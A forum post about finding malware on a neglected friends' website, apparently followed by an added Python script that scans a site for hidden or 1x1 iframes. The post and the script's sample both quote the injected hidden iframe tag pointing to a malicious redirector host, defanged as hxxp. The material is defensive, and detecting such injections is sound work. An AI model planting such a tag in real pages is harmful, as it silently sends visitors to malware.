A group of old school friends and I set up a website several years ago, just for us to mess around with, though it was mainly used as webspace to upload junk. We did come up with a half-arsed website to go with it, but nobody visited it (after all, why would they?). It was just fun messing about with Dreamweaver in our spare time.
Anyway, I went to the main page today, and it set my AV off (NOD32) with an 'HTML iframe.b.gen virus'. Asked one of them to check it out, and his AVG also went off, so I'm guessing it's not a false positive.
I also got:
Address has been blocked
devi56.co.cc/td/go.php?sid=1
ip address 58.218.199.239:80
A quick google reveals that devi site is bad news, containing all sorts of nasties.
Anyway, the problem is that none of us are much good with html and so on, but I loaded up the index2.php page from where the warning generates, and I can't see anything relating to that devi website, but that would be too easy, wouldn't it?
So... I know I'll probably end up wiping it anyway, and since nobody visits the site there's no risk of them being infected, but I'm curious to find out how exactly the malicious code got there. I've just noticed that Adblock lists the devi website as a frame.
So... is there a simplish way of tracking it down? I'm not going to link to the site for obvious reasons, but I could post html and php if it helps.
Thanks!
Edit: After typing all that, I've found it. In Firefox I set it to view with 'No Style', and there was a blocked frame under a CuteNews post. At the end of the most recent one, it had <iframe src="hxxp://devi56.co.cc/td/go.php?sid=1" style="visibility: hidden;" height="1" width="1"></iframe> edited onto the end of it. The friend who posted it has now been emailed, shouting at them and asking them to change their passwords.
Well, that was fun ^^
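The poster found the injected tag by switching Firefox to 'No Style' and looking for a frame that was invisible in the rendered page. The same check can be done over the whole web root so that you catch every injected frame, not just the one on the page the AV happened to scan. The script below is an added example, not code from the thread; it flags any <iframe> that is hidden by inline style, sized 1x1 or smaller, or positioned off-screen, and reports the file, line and src. The sample news item embedded in it is constructed from the tag quoted in the post (with the defanged hxxp:// scheme kept), and the set of file extensions scanned is an assumption: CMS post bodies may live in data or template files rather than in the page source, so scan those too.

```python
"""Find hidden or 1x1 iframes of the kind injected into the CuteNews post.

Added example, not part of the original forum post. Usage:
    python find_hidden_iframes.py /path/to/webroot
With no argument it scans the constructed SAMPLE_POST below.
"""
import re
import sys
from html.parser import HTMLParser
from pathlib import Path

# Inline-style fragments that make a frame invisible to the visitor.
HIDING_STYLES = ("visibility:hidden", "display:none")

# File types worth scanning; assumption, extend for your own CMS layout.
SCAN_SUFFIXES = (".php", ".html", ".htm", ".txt", ".tpl", ".js")


def _px(value):
    """Parse '1', '1px' or ' 0 ' into an int; None if not numeric."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else None


class IframeFinder(HTMLParser):
    """Collects every <iframe> together with the reasons it looks suspicious."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":  # HTMLParser already lowercases tag names
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        style = a.get("style", "").lower().replace(" ", "")
        reasons = []
        if any(h in style for h in HIDING_STYLES):
            reasons.append("hidden by inline style")
        w, h = _px(a.get("width")), _px(a.get("height"))
        if w is not None and h is not None and w <= 1 and h <= 1:
            reasons.append(f"tiny frame {w}x{h}")
        if re.search(r"(left|top):-\d", style):
            reasons.append("positioned off-screen")
        if reasons:
            self.hits.append({
                "src": a.get("src", ""),
                "line": self.getpos()[0],   # line of the opening tag
                "reasons": reasons,
            })


def find_suspicious_iframes(html):
    """Return a list of {src, line, reasons} dicts for hidden iframes in html."""
    parser = IframeFinder()
    parser.feed(html)
    parser.close()
    return parser.hits


def scan_tree(root, suffixes=SCAN_SUFFIXES):
    """Walk root and return (path, hit) pairs for every suspicious iframe found."""
    findings = []
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in suffixes:
            continue
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue
        for hit in find_suspicious_iframes(text):
            findings.append((str(path), hit))
    return findings


# Constructed sample: a benign news item with the injected tag from the
# thread appended, plus a visible, normally sized iframe that should not fire.
SAMPLE_POST = """<div class="news">
<p>New photos from the weekend are up.</p>
<iframe src="hxxp://devi56.co.cc/td/go.php?sid=1" style="visibility: hidden;" height="1" width="1"></iframe>
</div>
<iframe src="/videos/player.html" width="560" height="315"></iframe>
"""


if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path, hit in scan_tree(sys.argv[1]):
            print(f"{path}:{hit['line']}: {hit['src']}  ({', '.join(hit['reasons'])})")
    else:
        for hit in find_suspicious_iframes(SAMPLE_POST):
            print(hit)
```

Run it against a copy of the web root taken before you wipe anything, and treat every hit as a place to look for how the attacker wrote to that file: a reused CMS password, as the poster suspects, or a writable data file or upload directory. A parser is used rather than a one-line grep because attribute order, quoting and whitespace vary, and an injected tag split across attributes would slip past a fixed regex.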